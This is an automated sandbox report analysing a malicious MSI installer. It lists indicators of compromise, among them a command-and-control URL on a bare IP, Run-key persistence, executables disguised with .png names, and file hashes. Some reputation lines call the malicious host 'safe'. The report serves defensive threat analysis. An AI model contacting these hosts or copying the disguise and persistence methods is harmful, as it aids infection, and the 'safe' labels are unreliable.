http://20.15.106.83/SCP/index.php?VS=VS3&PL=NAO0%Avira URL Cloudsafe
https://yznv.prefintions.pro/derrama.png0%Avira URL Cloudsafe
http://stackoverflow.com/q/11564914;0%Avira URL Cloudsafe
https://www.foxit.com/pt-br/pdf-editor/adobe-acrobat-alternative.html0%Avira URL Cloudsafe
https://acons2020temix54.lisf0%Avira URL Cloudsafe
http://20.15.106.830%Avira URL Cloudsafe
https://www.advancedinstaller.com0%Avira URL Cloudsafe
http://20.15.106.83/SCP/index.php0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
http://www.mcafee.com0%Avira URL Cloudsafe
https://yznv.prefintions.pro/carol1.png0%Avira URL Cloudsafe
http://.jpg0%Avira URL Cloudsafe
http://collect.installeranalytics.com0%Avira URL Cloudsafe
http://stackoverflow.com/q/2152978/233540%Avira URL Cloudsafe
http://stackoverflow.com/q/14436606/WAsReference0%Avira URL Cloudsafe
https://acons2020temix54.lisf/0%Avira URL Cloudsafe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic0%Avira URL Cloudsafe
https://collect.installeranalytics.com0%Avira URL Cloudsafe
http://stackoverflow.com/q/14436606/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
collect.installeranalytics.com
52.54.161.79
truefalse
    		unknown
    yznv.prefintions.pro
    		188.114.97.3
    		truefalse
      		unknown
      fp2e7a.wpc.phicdn.net
      		192.229.221.95
      		truefalse
        		unknown
        acons2020temix54.lisf
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://yznv.prefintions.pro/derrama.pngfalse
          • Avira URL Cloud: safe
          		unknown
          http://collect.installeranalytics.com/false
          • Avira URL Cloud: safe
          		unknown
          http://20.15.106.83/SCP/index.php?VS=VS3&PL=NAOtrue
          • Avira URL Cloud: safe
          		unknown
          https://yznv.prefintions.pro/carol1.pngfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://html4/loose.dtdshi64B2.tmp.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://20.15.106.83/SCP/index.phpPeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.thawte.com/cps0/9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drfalse
          • URL Reputation: safe
          		unknown
          https://www.thawte.com/repository0W9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drfalse
          • URL Reputation: safe
          		unknown
          https://acons2020temix54.lisfPeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://20.15.106.83PeFIvJrY.exe, 0000000C.00000002.3847929255.00000000032FE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://stackoverflow.com/q/11564914;PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.advancedinstaller.com9rybs.msi, MSI6487.tmp.2.dr, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, MSI6467.tmp.2.dr, 495fa1.msi.2.dr, MSI635C.tmp.2.dr, MSI6F47.tmp.2.dr, MSI7003.tmp.2.dr, MSI62DE.tmp.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.foxit.com/pt-br/pdf-editor/adobe-acrobat-alternative.html9rybs.msi, 495fa1.msi.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.mcafee.comvJrY.png.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://collect.installeranalytics.com9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://.cssshi64B2.tmp.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003241000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://.jpgshi64B2.tmp.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://stackoverflow.com/q/14436606/WAsReferencePeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://stackoverflow.com/q/2152978/23354PeFIvJrY.exe, 0000000C.00000002.3849220507.00000000054E4000.00000002.00000001.01000000.00000005.sdmp, PeFIvJrY.exe, 0000000D.00000002.1729149617.000000006D564000.00000002.00000001.01000000.00000005.sdmp, PeFI.png.3.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://acons2020temix54.lisf/PeFIvJrY.exe, 0000000C.00000002.3847929255.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://collect.installeranalytics.com9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic9rybs.msi, MSI6185.tmp.2.dr, MSI7033.tmp.2.dr, MSI9F25.tmp.2.dr, MSI6F17.tmp.2.dr, 495fa1.msi.2.dr, MSI6F47.tmp.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://stackoverflow.com/q/14436606/PeFIvJrY.exe, 0000000C.00000002.3847929255.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          188.114.97.3
          		yznv.prefintions.proEuropean Union
          		13335CLOUDFLARENETUSfalse
          52.54.161.79
          		collect.installeranalytics.comUnited States
          		14618AMAZON-AESUSfalse
          20.15.106.83
          		unknownUnited States
          		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1486731
          Start date and time:2024-08-02 14:15:45 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 31s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:18
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:9rybs.msi
          Detection:MAL
          Classification:mal64.rans.evad.winMSI@15/33@3/3
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 90%
          • Number of executed functions: 59
          • Number of non-executed functions: 177
          Cookbook Comments:
          • Found application associated with file extension: .msi
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 13.85.23.86, 13.85.23.206, 20.3.187.198, 20.12.23.50
          • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target PeFIvJrY.exe, PID 7896 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: 9rybs.msi

          Simulations

          Behavior and APIs

          TimeTypeDescription
          08:16:43API Interceptor3x Sleep call for process: msiexec.exe modified
          08:17:15API Interceptor6006825x Sleep call for process: PeFIvJrY.exe modified
          13:16:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PeFIvJrY C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
          13:17:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PeFIvJrY C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          188.114.97.3QUOTATION_JULQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
          • filetransfer.io/data-package/eivFTmO7/download
          QUOTATION_JULQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
          • filetransfer.io/data-package/eivFTmO7/download
          QUOTATION_JULQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
          • filetransfer.io/data-package/eivFTmO7/download
          bSecDbrnMO4yqnP.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.uptocryptonews.com/ps15/?Bh=21AMTVr7VpXBosKFppEf26A/DeLfMm5QpmuaUPr99aq4XrKOrkrAajUh1DEbTobQjDw5&DxoLiH=dbYdUphHwt44W
          2024MSASI056553A.exeGet hashmaliciousFormBookBrowse
          • www.globaltrend.xyz/srh8/
          PO-00349.xlsGet hashmaliciousRemcosBrowse
          • fd.ax/2Jv
          swift copy.exeGet hashmaliciousFormBookBrowse
          • www.alphacentura.com/mnr7/
          RkvSAimoIv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 266468cm.nyashka.top/imagePhpPacketGameBigloadprotecttrafficDatalifeDleLocal.php
          PO-00349.xlsGet hashmaliciousRemcosBrowse
          • ft.ax/
          PO-00349.xlsGet hashmaliciousRemcosBrowse
          • ft.ax/k7B

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          collect.installeranalytics.comLisectAVT_2403002A_47.exeGet hashmaliciousWinLockerBrowse
          • 54.158.164.30
          WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msiGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
          • 54.224.49.0
          0cjB1Kh8zU.msiGet hashmaliciousUnknownBrowse
          • 54.165.254.88
          2ztvLMT477.msiGet hashmaliciousUnknownBrowse
          • 54.227.134.57
          ahx8PyqunR.msiGet hashmaliciousUnknownBrowse
          • 54.221.197.204
          speke.msiGet hashmaliciousUnknownBrowse
          • 54.165.34.233
          d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
          • 54.158.107.210
          d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
          • 54.158.107.210
          69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exeGet hashmaliciousUnknownBrowse
          • 52.7.13.177
          w1J9KDIC0m.exeGet hashmaliciousUnknownBrowse
          • 52.7.13.177
          fp2e7a.wpc.phicdn.nethttps://pakbutton.com.pk/mailbox/upgrade/25GB/clientGet hashmaliciousUnknownBrowse
          • 192.229.221.95
          https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013Get hashmaliciousUnknownBrowse
          • 192.229.221.95
          https://pakbutton.com.pkGet hashmaliciousUnknownBrowse
          • 192.229.221.95
          https://pub-fc3b3bfaa8f54a1b8d8485fe0bfe792b.r2.dev/HK.html#christa.claes@daiichi-sankyo.deGet hashmaliciousHTMLPhisherBrowse
          • 192.229.221.95
          https://www.bing.com/ck/a?!&&p=7522cfa299d94e97JmltdHM9MTcyMjQ3MDQwMCZpZ3VpZD0wZjk2ODVjNi05NDg0LTY3YzQtMGM5MS05MTBlOTU3NjY2YzkmaW5zaWQ9NTEzMA&ptn=3&ver=2&hsh=3&fclid=0f9685c6-9484-67c4-0c91-910e957666c9&u=a1aHR0cHM6Ly93d3cuaG4taG5wcmludGVyLmNvbS9pbnRlcm5hdGlvbmFsLWNsaWVudHMv&Get hashmaliciousHTMLPhisherBrowse
          • 192.229.221.95
          https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/Get hashmaliciousUnknownBrowse
          • 192.229.221.95
          https://workdrive.zohopublic.eu/file/1n0t05e999a7f921c44b69aef1f2423b63f55Get hashmaliciousUnknownBrowse
          • 192.229.221.95
          http://82.192.82.226Get hashmaliciousUnknownBrowse
          • 192.229.221.95
          https://hij.koc.mybluehost.me/Z/Get hashmaliciousUnknownBrowse
          • 192.229.221.95
          http://www.foodmate.netGet hashmaliciousUnknownBrowse
          • 192.229.221.95

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUSATPrSVPS6D.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          HQE5DRlPBT.exeGet hashmaliciousFormBookBrowse
          • 172.67.148.153
          PLC7VOI78L.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 188.114.97.3
          e8VyDhZmDR.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
          • 188.114.96.3
          The Situ Group Ltd.pdfGet hashmaliciousHTMLPhisherBrowse
          • 104.17.25.14
          3gleLIabQq.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
          • 188.114.96.3
          6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
          • 188.114.96.3
          https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013Get hashmaliciousUnknownBrowse
          • 172.66.0.145
          SNu4RXZpoS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 104.26.12.205
          n2SgyJt0GY.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
          • 188.114.96.3
          AMAZON-AESUSXCXxJoAEaF.elfGet hashmaliciousMirai, MoobotBrowse
          • 54.140.120.60
          js8call-2.2.0-win32.exeGet hashmaliciousUnknownBrowse
          • 52.44.76.40
          rf4LFk7Nvv.elfGet hashmaliciousMiraiBrowse
          • 34.197.64.214
          https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013Get hashmaliciousUnknownBrowse
          • 3.212.100.132
          E66M3O2493.elfGet hashmaliciousUnknownBrowse
          • 34.224.62.170
          3AV1PyEQ16.elfGet hashmaliciousUnknownBrowse
          • 54.19.4.177
          https://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29Get hashmaliciousUnknownBrowse
          • 52.73.59.20
          http://telstra-103141.weeblysite.com/Get hashmaliciousUnknownBrowse
          • 3.228.185.195
          http://telstra-107250.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
          • 3.228.185.195
          http://telstra-108674.weeblysite.com/Get hashmaliciousUnknownBrowse
          • 54.235.101.7
          MICROSOFT-CORP-MSN-AS-BLOCKUSmQeV8nCFUa.elfGet hashmaliciousMiraiBrowse
          • 104.41.106.230
          ZxHHuJB911.elfGet hashmaliciousMiraiBrowse
          • 159.27.104.104
          XAjV9ghiIb.elfGet hashmaliciousMirai, MoobotBrowse
          • 51.122.227.27
          rf4LFk7Nvv.elfGet hashmaliciousMiraiBrowse
          • 13.105.137.162
          JSd25Gusnc.elfGet hashmaliciousMiraiBrowse
          • 20.21.196.35
          ZeHA1CMTQq.elfGet hashmaliciousMiraiBrowse
          • 40.108.185.46
          E66M3O2493.elfGet hashmaliciousUnknownBrowse
          • 13.100.15.114
          3AV1PyEQ16.elfGet hashmaliciousUnknownBrowse
          • 52.177.85.34
          0lMevtsZn2.elfGet hashmaliciousMiraiBrowse
          • 102.133.226.218
          XtkUbewN09.elfGet hashmaliciousMirai, MoobotBrowse
          • 20.71.71.245

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1ATPrSVPS6D.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          f1d9f80142a942bbd5af2ec4f6cc96a0Get hashmaliciousUnknownBrowse
          • 188.114.97.3
          360a2293292ccc65368cab8ceee90670Get hashmaliciousUnknownBrowse
          • 188.114.97.3
          dxkqdn.msiGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          ver.dat.msiGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          uzlts.msiGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          SecuriteInfo.com.FileRepMalware.20211.23157.exeGet hashmaliciousDBatLoaderBrowse
          • 188.114.97.3
          SecuriteInfo.com.FileRepMalware.20211.23157.exeGet hashmaliciousDBatLoaderBrowse
          • 188.114.97.3
          setup8803165981.exeGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          Uduknnywyznljn.exeGet hashmaliciousRemcos, DBatLoaderBrowse
          • 188.114.97.3

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\shi64B2.tmpLisectAVT_2403002B_409.exeGet hashmaliciousBdaejecBrowse
            AnyDesk.msiGet hashmaliciousUnknownBrowse
              LisectAVT_2403002B_493.exeGet hashmaliciousUnknownBrowse
                LisectAVT_2403002B_493.exeGet hashmaliciousUnknownBrowse
                  WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msiGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                    0cjB1Kh8zU.msiGet hashmaliciousUnknownBrowse
                      2ztvLMT477.msiGet hashmaliciousUnknownBrowse
                        ahx8PyqunR.msiGet hashmaliciousUnknownBrowse
                          speke.msiGet hashmaliciousUnknownBrowse
                            d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse

                              Created / dropped Files

                              C:\Users\Public\PeFI\vJrY.png

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):358000
                              Entropy (8bit):7.242791638339027
                              Encrypted:false
                              SSDEEP:6144:zw4WNZknl8n6n33FxsZK2dx8ltV0Funq3QgiR3xtQAmUPP+UX32U+rv4T+rvS:zw9mSny3rGKV/0gnG8R3xtj1PP+C32U/
                              MD5:65CD1FFDB524F091FC06884DCB1270F9
                              SHA1:5AC35832CC0DCE15799565D605B12FD15ADB4DC7
                              SHA-256:32573224BE0A365DD4A94E5D7812D9CC98B4ACB60A3E85B2B8EA97EB2377E81D
                              SHA-512:BA9B6EFD5B8815628AAD54FCB7FB4AFB4C041D7B7140754259D7355728E388A371F81DD58F1D9CE3483D0D70F05EBC771EB6F3022EF17A0DB2A76273FB2F69D9
                              Malicious:true
                              Reputation:low
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........g....}...}...}-..|...}-..|[..}...|...}...|...}...|...}E..|...}-..|...}-..|...}-..|...}...}...}...}{..}E..|...}E..}...}...}...}E..|...}Rich...}................PE..L...Y..e.................P..........p.............@.......................................@................................................................... ..................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                              C:\Users\Public\PeFI\vJrY\PeFI.png

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):702976
                              Entropy (8bit):4.9566523846266755
                              Encrypted:false
                              SSDEEP:6144:n3cKjnv2eBLM6XxJ7UBebH6dEM4JjQvpi1p+e+WRc3RPMTNm:NwetyebH6dK3p+bsNm
                              MD5:27563EEA952684C3E2F5A35A81E021DF
                              SHA1:BC46C79DACE897088F989D3A34757D7592110B7D
                              SHA-256:EADCC6AD7B87CD61D5899A45D08A9D9897AFA62810048E1F1D448C696543EF46
                              SHA-512:9DB1BA740B7B1BD386751BD7EA1CF8BDF30D3A139F0AF81B2D652DBEA9153CE8038EAAE084DDF4F3136560BD00B68A8040C84DE1115658CF5B2E1C31CF99718A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7).f...........!..................... ........... ....................... ............@.........................L...(.......O.... ..`....................@..0.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...`.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe (copy)

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):358000
                              Entropy (8bit):7.242791638339027
                              Encrypted:false
                              SSDEEP:6144:zw4WNZknl8n6n33FxsZK2dx8ltV0Funq3QgiR3xtQAmUPP+UX32U+rv4T+rvS:zw9mSny3rGKV/0gnG8R3xtj1PP+C32U/
                              MD5:65CD1FFDB524F091FC06884DCB1270F9
                              SHA1:5AC35832CC0DCE15799565D605B12FD15ADB4DC7
                              SHA-256:32573224BE0A365DD4A94E5D7812D9CC98B4ACB60A3E85B2B8EA97EB2377E81D
                              SHA-512:BA9B6EFD5B8815628AAD54FCB7FB4AFB4C041D7B7140754259D7355728E388A371F81DD58F1D9CE3483D0D70F05EBC771EB6F3022EF17A0DB2A76273FB2F69D9
                              Malicious:true
                              Reputation:low
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........g....}...}...}-..|...}-..|[..}...|...}...|...}...|...}E..|...}-..|...}-..|...}-..|...}...}...}...}{..}E..|...}E..}...}...}...}E..|...}Rich...}................PE..L...Y..e.................P..........p.............@.......................................@................................................................... ..................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                              C:\Users\Public\PeFI\vJrY\WebView2Loader.dll (copy)

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):702976
                              Entropy (8bit):4.9566523846266755
                              Encrypted:false
                              SSDEEP:6144:n3cKjnv2eBLM6XxJ7UBebH6dEM4JjQvpi1p+e+WRc3RPMTNm:NwetyebH6dK3p+bsNm
                              MD5:27563EEA952684C3E2F5A35A81E021DF
                              SHA1:BC46C79DACE897088F989D3A34757D7592110B7D
                              SHA-256:EADCC6AD7B87CD61D5899A45D08A9D9897AFA62810048E1F1D448C696543EF46
                              SHA-512:9DB1BA740B7B1BD386751BD7EA1CF8BDF30D3A139F0AF81B2D652DBEA9153CE8038EAAE084DDF4F3136560BD00B68A8040C84DE1115658CF5B2E1C31CF99718A
                              Malicious:true
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7).f...........!..................... ........... ....................... ............@.........................L...(.......O.... ..`....................@..0.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...`.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\Public\PeFI\vJrY\WebView2Loader.dll.png (copy)

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):702976
                              Entropy (8bit):4.9566523846266755
                              Encrypted:false
                              SSDEEP:6144:n3cKjnv2eBLM6XxJ7UBebH6dEM4JjQvpi1p+e+WRc3RPMTNm:NwetyebH6dK3p+bsNm
                              MD5:27563EEA952684C3E2F5A35A81E021DF
                              SHA1:BC46C79DACE897088F989D3A34757D7592110B7D
                              SHA-256:EADCC6AD7B87CD61D5899A45D08A9D9897AFA62810048E1F1D448C696543EF46
                              SHA-512:9DB1BA740B7B1BD386751BD7EA1CF8BDF30D3A139F0AF81B2D652DBEA9153CE8038EAAE084DDF4F3136560BD00B68A8040C84DE1115658CF5B2E1C31CF99718A
                              Malicious:true
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7).f...........!..................... ........... ....................... ............@.........................L...(.......O.... ..`....................@..0.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...`.... ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\Public\PeFI\vJrY\vJrY.png (copy)

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Category:dropped
                              Size (bytes):358000
                              Entropy (8bit):7.242791638339027
                              Encrypted:false
                              SSDEEP:6144:zw4WNZknl8n6n33FxsZK2dx8ltV0Funq3QgiR3xtQAmUPP+UX32U+rv4T+rvS:zw9mSny3rGKV/0gnG8R3xtj1PP+C32U/
                              MD5:65CD1FFDB524F091FC06884DCB1270F9
                              SHA1:5AC35832CC0DCE15799565D605B12FD15ADB4DC7
                              SHA-256:32573224BE0A365DD4A94E5D7812D9CC98B4ACB60A3E85B2B8EA97EB2377E81D
                              SHA-512:BA9B6EFD5B8815628AAD54FCB7FB4AFB4C041D7B7140754259D7355728E388A371F81DD58F1D9CE3483D0D70F05EBC771EB6F3022EF17A0DB2A76273FB2F69D9
                              Malicious:true
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........g....}...}...}-..|...}-..|[..}...|...}...|...}...|...}E..|...}-..|...}-..|...}-..|...}...}...}...}{..}E..|...}E..}...}...}...}E..|...}Rich...}................PE..L...Y..e.................P..........p.............@.......................................@................................................................... ..................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                              C:\Users\user\AppData\Local\AdvinstAnalytics\66ac0c9e2ff508bfba878aa5\8.7.6.8\tracking.ini

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):4.0081320258334
                              Encrypted:false
                              SSDEEP:3:1EyEMyvn:1BEN
                              MD5:6BC190DD42A169DFA14515484427FC8E
                              SHA1:B53BD614A834416E4A20292AA291A6D2FC221A5E
                              SHA-256:B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
                              SHA-512:5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
                              Malicious:false
                              Preview:[General]..Active = true..

                              C:\Users\user\AppData\Local\AdvinstAnalytics\66ac0c9e2ff508bfba878aa5\8.7.6.8\{AF3E5550-CCB7-4030-8139-9A55D2075DE7}.session

                              Download File
                              Process:C:\Windows\SysWOW64\msiexec.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):13388
                              Entropy (8bit):5.413023695998468
                              Encrypted:false
                              SSDEEP:384:tG1fkJQa+HCOvWMUMdDm1aZDCrgYhqrmKl0FdJxxvw/zFO8xDP:tG1fkJQa+HCOvWMUMdDm1aZDCrgUqrmE
                              MD5:23FD4FCCEF47C1BFCBF8B80DF8F02115
                              SHA1:40A1010D0DDC22A0FA86F224F3E63D4C1852E11C
                              SHA-256:D4FB66DF06B5DB5A90381C1A2B1EF6C3A46AD25BF9FC95023E04A71F5C5AD01A
                              SHA-512:02A602D57FD315A9F4374C06FA8B0E5BD16DFF8D0ABA8DF8693621A4D12008FBA88F43DF3727801CDCFE363C1EAA6614108CC32BD3CE70A93B74D11259C1926E
                              Malicious:false
